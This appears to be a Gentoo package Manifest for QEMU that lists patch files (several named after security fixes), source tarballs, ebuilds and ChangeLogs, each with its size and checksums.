AUX qemu-2.3.0-CVE-2015-5165-3.patch 1262 SHA256 99062a9cbf4b96de8f0aa8555291cf6e296a9dbdf22ad4e9285912ba02de9261 SHA512 664ce64538441b0eeb93d1b5642acf3a1bd8c9c8b4cb5578d49e8226b967c9bef816caee41a429365ff0c5f982991f25483fc14db6c0a27d14626febaf8f8bcd WHIRLPOOL 013a32f4a5acffe8c2d79db4c4bc51bb36b666d8cc651c00aecf0d256952844bc25e7c6af3e588d4f365e7ae239e6c8cf5288e68dc1a40794a9fa274cd302e6b AUX qemu-2.5.0-CVE-2016-2198.patch 1540 SHA256 0d6d81a27ffac1af7c478a050aa690eb007cf9735a1a0c4b398eabeb990d5ab4 SHA512 b0b3131bb2b9b2d3f2a3f3286eeb92b527f0d3366e657cf8bcbabc6426b57893936c5a8ef66697ad1014b4525c09fa4d067195600f96ab2b005fd52b6e77d9a4 WHIRLPOOL f5c56b87f934c573fc71169fcded579b9917285fbfff59fd9288011775f482ead2ac09e1399f325e826305fab2f7bc2cd21d333711c526c1658a069a5ee93491
AUX qemu-2.3.0-CVE-2015-5165-4.patch 1888 SHA256 82d2214a0bd42b03b72b26170e4c80699d74bc691b6e223780a693ad2e9c267a SHA512 a7dba1a26f33c2a65ee84fd0d3e5606cd17f623bea0c33438247e1f8d6cd72217d02bd00c28a24f54506480b12092b7351551af5f9cdcf863157cddaa461b606 WHIRLPOOL e93418de51172b90fa6b81af459e8db6d330c64c83cf4061174ee6e220494ed80bb1ca9860d7b63f80385b9a9f1f2c530131676595526f86d31611db50ea8ac1 AUX qemu-2.5.0-CVE-2016-2392.patch 1265 SHA256 a81d906bcf18fb5cf76fa5fa686c848a33f43054bff03a7a2e0e391a34884be8 SHA512 cac6503176f1e37fa6e9bab1daa4bbec6fb6fb3be4ec2e30427356969f3310b8bb898356f9e7f786e75c3ba07b9bc7afb9f0ac7a99adc12847de49b55c0d7960 WHIRLPOOL 65456ade1b773ebfe629ab0fb0045613b4d2f0f5c2d9ec20409170cba5011de46800bf1dd42a78334fe5166a2c8201e6505f3db904474cd4c28d1e88df0f9daf
AUX qemu-2.3.0-CVE-2015-5165-5.patch 1070 SHA256 b728ae69e4a1d838bb1b4c5e6135e84fe8f6fc7e97fdc99915e7fc908edb4fd2 SHA512 7476649c099b363632b158b691f8ec2704590ec6e671f9bb013c7ffe50e593dc7c97278b6d09b5021605071a23b528875f024f5617a019954efac9c4055f6a83 WHIRLPOOL 760d4570045f34adcf1dba2937ece2a91b1e3da8c740cd947fdafbc03eee62c46ec4bb2c7bb993bb6cf7189d41bee3da49dd1773c579d9beea5f2b7e05da6f03 AUX qemu-2.5.0-cflags.patch 410 SHA256 17f5624dd733f5c80e733cc67ae36a736169ec066024dbf802b416accfed0755 SHA512 0194d28de08b4e51c5bd1c9a2cc7965ba7f66dfddb8fd91de3da93677e6cf2d38ad3270f69aaea8a20cf2533c2980018d6e0fed711be2806fe2053fba7c081f3 WHIRLPOOL 5f5b95d00409fbe03adb64801d30a2fb5f98dded5efa7f0e78b5746776f72917dcbea767e1d0afcb304d8bf8c484adedb8037e6d54e9d34997c2bc3a98b53154
AUX qemu-2.3.0-CVE-2015-5165-6.patch 1225 SHA256 6fb23646e05ef9a4b010d2a2c0235b6ee58a293f39ed40b6b1611115c948a79a SHA512 a1a38fdbc3f3cebb557ae00c3764bb268019b2c9f15731bb829b3b73a87856c5d51d65cc3ff712b28601298afb2aa82e83789bab867c8fb2816f23d515af8be7 WHIRLPOOL 9a17bd514cf5286c69a7955081d267febc1485d1df78ee918d6c16f8750247b3759cd60ec405dd7859ca76e396c5fcc04deb159540181fcdfadad13c41bf807c AUX qemu-2.5.0-ne2000-reg-check.patch 1141 SHA256 b64fd5bfbd9c7b37b9003271e9902db4ea28b71095a51e161c7698e2f690183b SHA512 7f94ef8cb023224750abc5c2c7d515ccc6ce7f8b655a1454673ecc291193551b9ae00c248c609368a0cf143888ba2c3a5a929a4f9477e5efd27f92c45abc8722 WHIRLPOOL 43fec025a08e0aa0c14ab5ac11cd9aa49b03e52e3fcaacb6785ecd25aa531edfd04a5f8913330e27acf046f8cad2c57887e1a353779ee73ab8bb2dad65c446a7
AUX qemu-2.3.0-CVE-2015-5165-7.patch 1129 SHA256 ebcadb69110ea4672795b52472222ed1ffe67a83e37c5b7d401530f43137c587 SHA512 d174df707dabbaf49fadda0db9b551abef0e4c2045287bfb78ded69c7b8e6a59333d7aa1459ac7a81c0f3f711ec225157d8dabcd63d6eed10bb5755cea608fbb WHIRLPOOL 58fc0a2974bd9c1d9d11de7f97fda8796b3af05338969eac4d685572e952cb0b0b752166572d3b81b40db862ad0a55e9bd83bc3c2344cf04ae8a12ba4e752f2a AUX qemu-2.5.0-rng-stack-corrupt-0.patch 3125 SHA256 164b155db78a9291b9f8dea71a16b5779e1a9d382a8cb0f5ff380d1f2d811cef SHA512 7da544873dbefbbc7a2ed69bd7cca0053bfe71ef7f5c2faf12cb5dc6e07b8d9104e5bcf329b3355e886edc5805509623234c9fe8fb536544d6285b04ccc59919 WHIRLPOOL f076264ce4bae5be2f34e006e3e4dcc20042313cb6da4977b61529c3100e835952807738d53a86967f98abad68eba1c8dcbb6a04af162b048399e059b5eb9d6b
AUX qemu-2.3.0-CVE-2015-5166.patch 1176 SHA256 dead84667dd4868d0688dc4e62a54a14883e6f0352cf3318b277aa37e27c9261 SHA512 977e6d84d6e016dd0ba99d00f19c28b9976fdb58fd856457e08a2f9204554946a76f1fa6bbaff68f344bdddd791e13942b4b984610fde0a80645bd859fcbb781 WHIRLPOOL f4f9751acbc6d8b29074b98ecd7ae45fb13952f150b64412b1f783df14f49996b1a5eb398c7a954a4024818cddad40e7ffb187c830d7e3b0afb01662d0e8569a AUX qemu-2.5.0-rng-stack-corrupt-1.patch 4110 SHA256 16966eb20072a5d16fec46e5959e32708342af9a7266fe4a90a0abaf68af3529 SHA512 530d6a5f9b6795013bbe197cf0a0d7eddfb06d18c0f8410bcf5bcc2d32c4b72c325b8b0ade2c517bd305fcbdab03124cc527d24d73ce767daf51de65d00920c8 WHIRLPOOL c0b653c67993c6c6ed282f0c86099c8c80a241f10e23ef3fd8e33c6d86fbb5553049550e83954cfc6d3576735c4ce28099f813917966c0a05c84bb46a6bee413
AUX qemu-2.3.0-virtio-serial.patch 1099 SHA256 538cd32785bedd1c2777e776757b105ba43c38da0d4f61972e3a271c593542ef SHA512 8606330bcca4891d7899bd22fce5405326534d19c36324c7e6e7d098d3c4c0f82420d5c5a49c526ab680283a97cbe4e6293c93daace63cefab0a480665080968 WHIRLPOOL 40228d141abc51174a4bc6bd64df8a8f0631e5ab15db9d088e964e4538994dfdfc6898496c66eec45cccc716758535ce1a0320c711690d26bff4cd14313956eb AUX qemu-2.5.0-rng-stack-corrupt-2.patch 4601 SHA256 c2b4e1ee8ee4bb2f4d42012a847c1da83a9e2349238d37bba1a3b9c440957f7f SHA512 ba299d07c7382f39f177f8094594daf131727d3d28633b426064f7cc6bf75d19b1ae78db248fc70ddbdb43fd2a6b0c5ed7793e6f42aba2763cdb4c12d6816c54 WHIRLPOOL 62b6ab75c32574a4c53193d82c7f51efdaa4789154c2d2f9acee7ede240d2920d92e31dfead7edc17aa12f938919143ce049d2c9ef9733baccc27d382506437f
AUX qemu-2.4-mips-fix-mtc0.patch 2885 SHA256 b668a99135c3e2c86558adad4fee4f9212f3b95c813476de0d17b7118c86e88a SHA512 27b7472d68a889253691daa1b500bab32e0cc30e02b9c961823b5104d675b80a0934e2a130cc584cc22b561c304420b913a63ca24c7d17b57c546b756294fe28 WHIRLPOOL 3594e8dd939995f57109285ccabb0d04a45a394afdf752dd6e3efec30df2cc7b4f495eda812df93930fd7b0e7df6df99af38b9518dddf040cae3704de8f7905a AUX qemu-2.5.0-rng-stack-corrupt-3.patch 5519 SHA256 5a3c2ed59bc30f395aee5cd0b77cdb06d868386e5bbe1b392169f8d96ae9474a SHA512 f62713130d3b989b274476a4cc2eafb95dc41de4723fe475e454132817a159eb729bbbe5a29aee755715100095670107c5762271184252e9d0cd43c4b25bc5d1 WHIRLPOOL f8e4aa90b90b03dd6e4dd68734cb16ee5f59a9585697ef3c48e7e861968798cb3c66018ad5a788f99b99e9fddab2ae83d977ec4b1a8599596a5ce03286726e3e
AUX qemu-2.4-mips-fix-rdhwr.patch 1436 SHA256 82e6ea28080f872999449dbc9ba78105e4224f158148cd11639a7ab70e4156d6 SHA512 9d18bbc469c313140011875a12ac8c4c86f4467c4b563befaf79cd9bd54afa48e36c8510e53f3d59c18949a78c843c7eee67d14ef3fd3ec1cd58ca7b07fc8c1d WHIRLPOOL 7aa88dd673ad879d679a42ad8cc4c5c84d82e410e4ba61b816e72366cddba18576a771bbb0dcd41590214fbf2204a3fc23ca36e8b1eca65443709eeba34797fd AUX qemu-2.5.0-sysmacros.patch 333 SHA256 a5716fc02da383d455f5cbd76f49e4ee74d84c2d5703319adcbeb145d04875f9 SHA512 329632c5bff846ca3ffcdb4bc94ae62f17c6bdbb566f9bec0784357c943523e8ca7773790b83a9617734cab3b003baa3d636cbd08f7385810a63b0fa0383c4f0 WHIRLPOOL 2a774767d4685545d3ed18e4f5dece99a9007597d73c56197652ff24083550f987ffb69e5c624760dece87def71a7c5c22a694bf999d7309e48ef622f18f0d73
AUX qemu-2.4-mips-move-interrupts-new-func.patch 3300 SHA256 9b5de8422b0342eb054de6decb282d8affb566679b93ef626824619890bc293f SHA512 489ca276f03496f0e73b986e46b87bcb49cfdb9c60039e33db9c879aab78d9a4e0d683b19527ca156b336575980cab543a965c8120a35a892a9c64edbff25c72 WHIRLPOOL 5274ccc56735a2e6125a77fe8cf16fb15019f8192cc19c23675541b819d7d0b8616519660a5235a1d4467e443f22fa1a5431c02c3d2bc8b52c74857ccc7acce2 AUX qemu-2.5.0-usb-ehci-oob.patch 2014 SHA256 e0593f8a645dfca3115ea56d1b74d701f07c60d80eadf0bf68133e7539de345a SHA512 c02e0881bb85ffbf7d401b4ee5801692262cddaef9245dfcbf323f0f4d310394e1fbbf639f7a3d2d39ae428c09513adcb9be7fdcf49b7accf133d911dc0b702c WHIRLPOOL 992b2c6d3464a53174054f0d2dc6ec70eeb1e17128ee65c7986d9f5ec80e037bca9bd5bfb65c66bb9bf85f0b56a1a6d008ab4dbe35602d7deea9489add2e7c4b
AUX qemu-2.4-mips-wake-up-on-irq.patch 1198 SHA256 c83b15aa32aa2712dbdabc8f0de0bec6018e06739762f7bfc10ee8a358c981ec SHA512 529aea936c09972f3dc7a5b0aeb743b988e01064434d7cf7ba565f04e4c98760a1f1bcf2b58e7784a41a78db59d6350e2814daa1f3962f16ea3dd600d8c65975 WHIRLPOOL 28fd4555f88ef6c75032715aaa96f0320f742c4a31d03d3395bfbc3b7b192624df1c4c90436f3a5e114017f29d4f3301b283d32a8f9c05ba87c1e78b187176b7 AUX qemu-2.5.0-usb-ndis-int-overflow.patch 2404 SHA256 caa4ff5ab038e88b2b09f04f2a9528fc47d42d35fbd35bbd7907afd292ef66db SHA512 f87de0a9f161f14814fafc883bd557f8f007a53729dc3c36145dd19ea9c52eabb81f6ada4e4a7122a461c9bed6f524ea0b92f9182b77a4c7cf9c8ecfc217f8e0 WHIRLPOOL 6022a3e0b125beb85efa2b6c1edf5a94dce27bd299d247078d418cf6515c8fc0ca1d8032034ef427c3d4681cc3536900099391b623152b2609cab2f4f963d046
AUX qemu-2.4.0-CVE-2015-5225.patch 3615 SHA256 9fd2f8a6415f437bbd622aaca44127713f80066b6ced3e745556ea96fdedffca SHA512 d6e7c2b350a2c5d2539c97d5d7af5a70b62cb8aa48c760891632660cad0a242599c1aff3040e0acd96cca09e4b2c13e57364bb06a8095de5fbb7ca1886049f4c WHIRLPOOL 9cca560fe7af780164dcc4ac46e686d353272666a2752db07860651e369024ba35a6efaca4583b05dfda35f773df96bd2e6d59bc65ba4d6059e648a2e6bfba02 AUX qemu-2.5.1-CVE-2015-8558.patch 3237 SHA256 3320c5624a33076b36f39566a4c3bbe5f95adae44207512d791175bcfc3959ff SHA512 c6ea0ca7d0ea221e9704001d26dae143861463ec45c7a543f041520874dd6e3a2d4bdb6d1eca25097f265aa2a1600858c9908b59cdd640007ab057cf7b86083f WHIRLPOOL 0c3c683a79f68ab3073a3b5e6afe2b6184d66254bd8278e131d5aa199ff51d52e5b186521ff8799345b1f1977afc112550e1a7d4b684b2a3267e9caddd0f1576
AUX qemu-2.4.0-CVE-2015-6855.patch 6999 SHA256 0fa992f4fabc89c23b0326dbd6bbe1d0d15eca8c18e3390a6ede2c2632d5fb21 SHA512 acc7ae986cda69bd2d66b80080081785b91e6379a8cc0554f73fbf6bf95a4755a69527a3ab0cf733ce1d0af753af551778d2592a86be27574e02c6555a81f0fe WHIRLPOOL 45b01c29590bcefc4c78c4c652fc2398cf435ac17f74544f95192efe51727d230eee55a145151630c1366df4a5964c748f57fb6a75c208267eb9f800d4138e0d AUX qemu-2.5.1-CVE-2016-4020.patch 567 SHA256 6c8e933593cfbedc98de81bf01e394d1ca1d016109fcc81e91f6472d2092b1a0 SHA512 90ac43329cbbcc0451470e010a1a1bd32ef8891c1f2d7d7e54e870e740c77ea8dfdec30989d586aaea250de6ca294504bf7e88818bf35e3269cf528ea3e50ce5 WHIRLPOOL 7ea7c7af1f2a3f11bc5bfe7b708021bbcb03c00d354a733c0fad14193110559cd1561939bd5bb6597a84bc01e74a914ef9dc51f28c522473b424919edc17cdb3
AUX qemu-2.4.0-CVE-2015-7295-1.patch 1956 SHA256 5d129e767fc5cbeed78a3cee89633a7bfa8fc298ff1753cb70fca31526f6032e SHA512 e5897855cc3f3196c804395b770bf58022a17e3dbb30224c403631fbacd4f2d93b8072828fa77a568b1f26e96e322ec88088a27484df7ed9598d94b6b4dbbf4c WHIRLPOOL 66251d14fb0956c84801c1d9e346e53b2be5504efb20166cfd27ab5785cbfaf1aea086b442fb15d119599ab3d64305dd8973989d5e1971bf6f35e0086fc366a4 AUX qemu-2.5.1-stellaris_enet-overflow.patch 1569 SHA256 5d20aef8139068eeb63c167856c8f0004e8761227d9bb1fd67240c4b922f704a SHA512 92c015af82eb92bf5f6f4d6fd86b402636a61f0ac9572cc2f002d4c795ce133f7858a38336fd5f4a25c7157dea969d288bb73f00d9a8b3b8f517ba2aea6e4ba8 WHIRLPOOL 94c49f8f78864ac3da247b569d2afc2ee0d801482a00117a7898fb396440118ef3bc54e1b61023496184f37404c893a1ef7725ce6ca9a27ca596cdf38e747603
AUX qemu-2.4.0-CVE-2015-7295-2.patch 1990 SHA256 6039c16c9310fdb3d1ea82fb8a1d876bb6eca8908aa2c7c9c246d3210ef3b339 SHA512 c62fc946c70f818cf8f03fd522012c666429fd17ca473757261a96f8569fb94f09d904f5f6cd6eec342e77ced43c0ec3e38bf9d45291f225e8ee9e765e9d0310 WHIRLPOOL c05628bd77df60b5e35912b8954dca0718f7c8f15d96f854e76c9195a5ed46cb2c6a6d4e642c53299015705ddc07c7d887224d589ce05a781700ccdd93528bef
AUX qemu-2.4.0-CVE-2015-7295-3.patch 1712 SHA256 02e10ecc8284fd0514e233e35ca1795df29672e72372ac111103842844fb4b3b SHA512 ee77eb448ebf9c06fac3a0371cf5221b98c03c2355feb9884501214a7d885abd53b2b1a238971d34db7615ce7de3c93bc96577e53c10ff42717439b4efe5a727 WHIRLPOOL 84f48eee2ec434bf4399a8d7f525d068d18cb9172713e74b455f6feabe252571ced53bf3ce1c077a9b3f20fb6a18366fcd5b3db25b2192c5e6f7359724c608ee
AUX qemu-2.4.0-block-mirror-crash.patch 4752 SHA256 14aa1ee6eb9e4728d6f3769c46a503d5295463a406e940853371c004e6002567 SHA512 f96f0046e48a38c46d78b0ab230c0d0ed0ed8c8ab31d14dae4ddb96affa6f553646ef0d1d7f86072a7ef88149051c54e99eb1649e18ebe33db30776dad90aa04 WHIRLPOOL c1c0bf2dcc1b4bcf6e46e9b0239b504aeccc4dc55753c7e29fb95f48f5f04a9e21fb2b17468a8296e660c2478bc6570e876c061e151ec4c69774098f698747e3
AUX qemu-2.4.0-e1000-loop.patch 1379 SHA256 16783c9d8e81fdb0c6e0a079a0f4feff5acf8d90e35989c2e0937ed95136f270 SHA512 492ee88d938bb9c470c83583700963f395b634e91ed65cfaa73d07cd9d2cfe715497cb07b88f8ade5ff733fee70a1f3847473cb40cb47e53a008814112cfc0b1 WHIRLPOOL bd070d6e6181d9c08e3496cd460ce3138ec8e30dc6836656f2a38ca41398c6f9286f2e1371e140c8bb2137f5f09edaef467310819c124ad9b3a087b4c4110b0a
AUX qemu-binfmt.initd-r1 7965 SHA256 ba867d85b884cffaa9e355f0609e677940b5ce3f7adbae0006c52cecfea718aa SHA512 dafc708d873ece28b50eb4643d243c57df513b9ecd8cbbb214e8db2881cdb83d989f7e27d364bdd261c5bcf48c3d28d6008456293419d0fccd8e516475198fb3 WHIRLPOOL f4313dd236dbc4ba083b6168ce5ef371ad36ac88e84dd3261b0273a2376c8d29fa64170f4e458fa4afd5c8774607a4484dd908952b9b73153a5ee2c3671e8d01 AUX qemu-binfmt.initd-r1 7965 SHA256 ba867d85b884cffaa9e355f0609e677940b5ce3f7adbae0006c52cecfea718aa SHA512 dafc708d873ece28b50eb4643d243c57df513b9ecd8cbbb214e8db2881cdb83d989f7e27d364bdd261c5bcf48c3d28d6008456293419d0fccd8e516475198fb3 WHIRLPOOL f4313dd236dbc4ba083b6168ce5ef371ad36ac88e84dd3261b0273a2376c8d29fa64170f4e458fa4afd5c8774607a4484dd908952b9b73153a5ee2c3671e8d01
DIST qemu-2.3.0.tar.bz2 24683085 SHA256 b6bab7f763d5be73e7cb5ee7d4c8365b7a8df2972c52fa5ded18893bd8281588 SHA512 7a40d213c5696b27784abd2a3119e49d42c38c923be431826c73a8f14c19074435d7f1a652686c53baf08e81f5a3005b2ddc92d67c32f6a2b19659ab627e9eaa WHIRLPOOL 9dad6e342027c3be512b4e0b40e810e0a6f1dc84a16847aa5aac74d97f7a347e60d42e770335a090f83e90a1614294f86552a84edc1faafc7093d3e32602f5de DIST qemu-2.5.0.tar.bz2 25464996 SHA256 3443887401619fe33bfa5d900a4f2d6a79425ae2b7e43d5b8c36eb7a683772d4 SHA512 12153f94cc7f834fd6a85f25690c36f2331d88d414426fb8b9ac20a34e6f9222b1eda30b727674af583580fae90dfd6d0614a905dce1567d94cd049d426b9dd3 WHIRLPOOL 8f5717989d8d234ecf1763ee386b2e1f20c3b17918de130c6dae255e4523a230b2b01a759eba25e4b9f604c680d9b868c56f58bd71b7c6c2c22a2e46804435ef
DIST qemu-2.3.1.tar.bz2 24692020 SHA256 661d029809421cae06b4b1bc74ac0e560cb4ed47c9523c676ff277fa26dca15f SHA512 309e6df7dcc0a064d1a17c7dac2f60398700dfa8c6b60b66e4202966248097cbc49af75aa97725bc34773151be6fd75836810e9f0741ba65cdc208414fa78f6b WHIRLPOOL 26750ee00513daa99cdcd585c4b8407b8258a9c3559ae6335266d7754cb6679e7c10c56f8d12ae0ef2b5cd5d6a9a6a536213f8e86e81ced37e46205c796a773e DIST qemu-2.5.1.tar.bz2 25464539 SHA256 028752c33bb786abbfe496ba57315dc5a7d0a33b5a7a767f6d7a29020c525d2c SHA512 66959ad6a2a89f23c5daba245c76f71ddc03a33a1167bca639a042ebbf7329b2e698cd2c0e65c22a9874563a34256a48386aa9df6475b06d38db74187e3e3b3f WHIRLPOOL 32525271574692d56b7794dc63606659f46e6ae19a56dee31b3cec33dab9c4eb74147a65db4940229492d8680f38c2d05bc2a8fbcb4b6887b0c1cbe5fbbe44cf
DIST qemu-2.4.0.1.tar.bz2 25068555 SHA256 ecfe8b88037e41e817d72c460c56c6a0b573d540d6ba38b162d0de4fd22d1bdb SHA512 08eabe92fa9096386ef00f8e9d99eeec1508d15e5a98431e043a729cbaca2d96d6e3afc612e7c4a0fe5a6bba80006276185f1066b4c73105b2ea24b7e9133b84 WHIRLPOOL 1daaec23d6ada6af8bf4902e590fb96375e7149d2f53ff6bf6d8fb39722c182a2d2efcc0d40bee673a8316f621983c512daa54202bb4e632b3a4b09f0268cd09 EBUILD qemu-2.5.0-r2.ebuild 21213 SHA256 ffd80b3b663e399b9320d18cd7e2f1c59f307ae586672cc863f07fdb3ced9643 SHA512 032c5ab17ab8280911be0994731b0d0d4c48d27caade00f9963a222655778ba83f825c1279cdb5b7fdffdf792e412e1aeef4b8bf413a4866fe2d97267b23eae7 WHIRLPOOL f3e086e56f4ddeadf1af2669d88adf89f50119187bbe225cb9879a2ec1bb25f9df5bf15e6e8ae6651cb8bd7f17b85147a9579815a6a0bfc5b8d4633512411b01
DIST qemu-2.4.0.tar.bz2 25070979 SHA256 72b0b991bbcc540663a019e1e8c4f714053b691dda32c9b9ee80b25f367e6620 SHA512 8740e0fb2c654ed897dff4649f1f83d14d57cfa9cbde723899f115982f93253ce9a2bddd60aab379d241027d2044137770efe4c0b3c83d5b20f3a2a06f05a5dc WHIRLPOOL 8c6cfae096624e01f0d5daeb86aa2dccbeaa86d2aeab626cf55cf20b7edace82d0b0f3a1d85eeb2dc1fd53abaaa9dccf8f0d7ddc657a1f5ffd72fd68301648f1 EBUILD qemu-2.5.0-r3.ebuild 21501 SHA256 0b5ba20cc3fe4a4688ea31eb266251c72f7938982a1300d0b62a267409b49ed3 SHA512 6b0c777e10ba293f137471e1aabe042d03396da81c481ecf559ea54194fb7fb8e06eff90e72eaf976c1f2c32c1018f619be83d67c87e4682777c2d0481935313 WHIRLPOOL 3e9cceb5cbf01b007166f9ac9718beb2908179cc20971edb217a9c6a67703c5a372471d1c2f016c0f3ee4e41f3fd2e2d2b8487d126f72b2860a1da9530f25430
DIST qemu-2.4.1.tar.bz2 25087522 SHA256 e3d5cf4c8b1f9129c9c797329a515bfb6b3b1ded0ab8b394c8a316490fe3a177 SHA512 fde32b71a50d888c1055e61f4e6dfc45bb97e8e9ebee490c545965fbdcbd5ffd859fbf20648abed1f4fa9fcc5635e9b22e1829bbe802fc8aaf989d6013235917 WHIRLPOOL a698cfa5d2d138eeddb3c6bea57e3b89ca5d47165c04ed1cfd66a81647ac59cbdd594c919abef67bf198278da1160c5b9f3a0da84cd73827f3eb19a6e6f05436 EBUILD qemu-2.5.1.ebuild 20836 SHA256 97d70b39804507b5302f49b838660faeb88bc83ad34df674159e84e27391f550 SHA512 f488a16db08c5ef7c5f963dd6af62f98372b0d6fc581526443b542695f48fcb47173767d93a96e6ad2aad8b42336995f18e2f06fb0374f93786f908d8c8cdf38 WHIRLPOOL 7d16196f9082d85c6447bbf68def7224979998392e2b4daf6bcd988976324f2f2a87e6b316895efb19309c395c6872ef94cc0e3c7fe5fc72b8668d287854bd8a
EBUILD qemu-2.3.0-r5.ebuild 19412 SHA256 d9e18c9bc8207c101b172cc0f745851e98ebd03e2113a6ea16981f25a02e3df7 SHA512 dcab95af7745260e0c3365f2c250a18d1dccb11f3de7313a6d5168ff7c4881709096b43061e68643d4864db0a087779ed26d7fbe12dc6dc9f87d71e8e72f4458 WHIRLPOOL 228e9da0b0cdc0f357373d76d15fca4a1aed1899a5f4af7ae662b683c7bede9398b8026e374ce1767b993b9ad73f9e8ed2108125aaed478f6a8f8b0c3799b4f1 EBUILD qemu-9999.ebuild 20438 SHA256 426266cd915e46cbd411918036620bd1573de5e7635b157b0439180b031f61c7 SHA512 e75b5d0b2a1c1ec53dc3361150f866a49bed33d60e15d22f30b7c6c9553aa4a703a86ed810b436db8e22622a557fc632cdb1c6bc841ba036e70304b60c91686c WHIRLPOOL b6032fe8365b368571dd287354f24d5a5b2619801ae32e2decbec05c9de1183c6e2e62a7752debfdb535845256734c445ea41df052ca304b477b4120a96626e0
EBUILD qemu-2.3.0-r6.ebuild 19469 SHA256 80c525f4dc1f871da5104eba9efb09f2e6b29639dc42e7ce4fbc38c31c57e757 SHA512 4937afc1d233999b2615f4c39fb2feeb78d5693f192477b5fae40d1df22835105f9aa15a8b2d4415aac0fa3e6cdfbf1c62ad4b2cb9a0756e92fa7acae40a63b7 WHIRLPOOL 107f994f2a4231b3ba01daac08e4201cd7edb377f1523aa88fe618e61033bd4e2ccce2db113f7977cf20e637f63fe7ec58a1d1abea2b8c14b9623a5ea233a00c MISC ChangeLog 21726 SHA256 122bec0ab846dd96b13894a7f53bbdc5fb675718fd87cf2e3c91cc9768487188 SHA512 e5a8a9b3e8fbee9364e0fce590c1607efe454a9b42c3511d876ee5f6aa5ed559f81f1c9da3941de55414d7c48dd358debdc5dd6800867aa0586bdf637ab40867 WHIRLPOOL f2faa0dd2a3f24e517e6bc93dbccbb3062fe23f4c5161fef938ff6e0eebc43c902c240fb37fe93c4c0272023685463aec9af468765d9d88cdf665eb99b4bc2f6
EBUILD qemu-2.3.1.ebuild 18663 SHA256 1a7eac60288e8da44c1dd575d5e3cd9cdbd6bef93a5663f17bf5347208f601ee SHA512 3b0fdcf022f1ba1ed9833b4bebded4604918ef2c6bd2a54d5a0b0f350d45da8575b83aa5de5a39ced67c7541eba5df7b5932a25528ff7502c9e16db7193670f3 WHIRLPOOL df3a7c3fafd78b4e300fee5a3cc15fd7c249ed2bc291d6bff41ff4a8aeceae70cb6e28caee0674b434a252dedd9f6b7b56d2b54e3ca0612e5d58de56409b0cc2
EBUILD qemu-2.4.0-r1.ebuild 19325 SHA256 7e3e93dcd376e33007183de3cc13e60112cf3e09c7f52dc6f1364e87a6e07641 SHA512 dcc291bc60dee4ec3b224784d4d03f0d1d00d45da7b90d40c07f5b4da8983d9e3f19b9df651144d7a0911b2872e7a0e4b88fe95d9d20b0a436cde784869077f0 WHIRLPOOL 6db9ea83733c4553b5e356dc41419e10e37a82137ee2e344e03337923a79da8603f5f9f058e017de0756191aa196ef54d3bdec5267e2d223a81269dd14a363e9
EBUILD qemu-2.4.0.1-r1.ebuild 19456 SHA256 989cff4508d12080d9d76941cea727243b36eaa43f0ccb3a6120e8e64bdda2aa SHA512 5339613037480a1c6647034c41c64dd6d459f97f548bfeee3c5b447ec4bd69cf5e7a131e6783b6ab5123613a3999f0b7bde471c00decd80da031119b06219014 WHIRLPOOL 589326924c9616b9aef9b2aad7d5119039fed64a3474b426d262fbcdc46d7e1eb88a2dfbad11bcca3a93294b74b1e910719835b8dadbc399f7279e09701808a3
EBUILD qemu-2.4.0.1.ebuild 19352 SHA256 e113f46d6ebdb2f177ad4c67317c3a2a080d28300a1381a0a1ffbce1e46420ba SHA512 819ca540323f93b11a8165b3f818726e8a5b5396ead0ae78201a4e2f2764a8ecbe524b4e7394338fb11017787b06d1bcd2a4ab25068841acf399e3c69fb462bf WHIRLPOOL b04b50f6eed88070a91d210c02cd15aa11cf505c8e7e0d8ed88afeb2b3c277fee770b80a73b12dddf78165a546a041882f20cbc67a2ff7687a5829f6432cde61
EBUILD qemu-2.4.1.ebuild 19200 SHA256 36d1268e56168b08e473beafb643aeabec71fdce131d6349e3dfac61e7febd84 SHA512 9c28ed9a89d0ae6e045f85bdb395d9aabc9c4783b78f00fe1a8f29de1cc6072b1f2b203df54360a9ee17cc01a1cffb5ce80f2d3b2b74d4b840929d46648bae22 WHIRLPOOL 4f0af972bdb83dcb786aad459ca7fe28ddc39ac49e9de59a9d4edd40ecbed8fb190a115417beead8877e71bc33bc8609fa3478b23d160833effb02fb58a923bb
EBUILD qemu-9999.ebuild 19330 SHA256 104237b108e5a82503886090ece505e3d3d9f5fa2539e8ea7a74c575c19e0eaf SHA512 03b6a3dd872e14079a898dbdef18d05ae18e26913b533dadeffcf535d5802b0445e9edd80fb4646db267a6dfff073231fa8bf6990c8f279c8ca15fb94a2b9767 WHIRLPOOL a646929be159a016af1ba0d5b8319f97cfe500aa655fa6f30776eb251c8bc309a8a1b829f88b5eddbdaf924abd3fa82a4c9de4c96010ccff4bf472a22a61a873
MISC ChangeLog 8773 SHA256 baaffabab2086273f01f1fa54a924e84f8b298a362e6e6c8ee61f1be10ba8b5c SHA512 2bb6b4739e6070db8f7f20d902cd724ad0d3a7da0abef3140a8bdb047b1729b101e68c596010a3600d2dedd71dd8f374a898bf4d1f176c7655777303a6912bc8 WHIRLPOOL 7bab159850a8ec3ab635eff94cfec644aa504a2cfddc11e5dd0782876936d76a30d9d7fda5370faef09d20087a6c36b4a76430d1b893b857370975aa2c02280f
MISC ChangeLog-2015 58193 SHA256 60c1a4f4c85515520ab14da920bbbf4a6813491ce16b5357a0456ea588815a5c SHA512 ddfe8e75aabe59b731a4a8b31839d8c71fd516620306d2bc99d7641cc501652974e053104caafa7550c5ad33b6834295f6743a98b9419d292b8bf6f67918ccd3 WHIRLPOOL a6841f79c3ba1cbf76a8c7fde296a2912c46ddd251494dca3bf3bc13391c80595b6f80125c383823899942248008ede7065b0f5c8e43f9bc1d0464aa62cc187f MISC ChangeLog-2015 58193 SHA256 60c1a4f4c85515520ab14da920bbbf4a6813491ce16b5357a0456ea588815a5c SHA512 ddfe8e75aabe59b731a4a8b31839d8c71fd516620306d2bc99d7641cc501652974e053104caafa7550c5ad33b6834295f6743a98b9419d292b8bf6f67918ccd3 WHIRLPOOL a6841f79c3ba1cbf76a8c7fde296a2912c46ddd251494dca3bf3bc13391c80595b6f80125c383823899942248008ede7065b0f5c8e43f9bc1d0464aa62cc187f
